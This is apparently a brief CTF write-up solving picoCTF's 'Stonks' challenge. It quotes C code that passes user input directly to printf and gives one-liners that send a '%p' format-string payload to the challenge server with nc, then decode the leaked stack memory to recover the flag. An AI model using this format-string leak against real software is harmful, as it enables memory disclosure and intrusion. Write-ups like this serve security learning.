picoCTF Stonks writeup

make and run it:

gcc vuln.c

If the flag is not found locally, it must be on the remote server.

python3 -c 'print("A" * 200)' > api

it works fine.

char *user_buf = malloc(300 + 1); //Allocates memory
printf("What is your API token?\n"); //Prints input prompt
scanf("%300s", user_buf); //Reads in the user input and stores in user_buf
printf("Buying stonks with token:\n"); //Prints info
printf(user_buf); //Outputs user_buff [VULNERABLE!!]

As we can see, the function type is not specified.

printf(user_buf) Will be affected by the format string.

Remote Attack:

python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | xxd -r -p | strings -n1
python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | while read line; do echo $line | xxd -r -p | strings -n1 | rev; done | tr -d "\n" | grep -oE "picoCTF{.*}"

--

--

--

#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

PHOOP — An Object Oriented PHP framework — Design Goals — Rahul Singla

线上睇小鸭影音[2021-HD]Tom & Jerry哂成版本-高清电影-在线观看CHINESE【HD.1080P】

2021 Wrap-Up: Announcing Emissary-ingress 2.1, Telepresence 2.4.9

CS375 Blog, Week 2

Enemy Wave System! — Part 2!

We can’t stand it, we need to rewrite everything…

The Secret to a Happy Marriage

Clean Code — Easy to Read, Less Headache

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0x0021h

0x0021h

#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

More from Medium

Lumberjack Turtle Writeup — TryHackMe

Jumping in Headfirst

Insecure Deserialization — FAQ

Pickle Rick — THM — Complete Writeup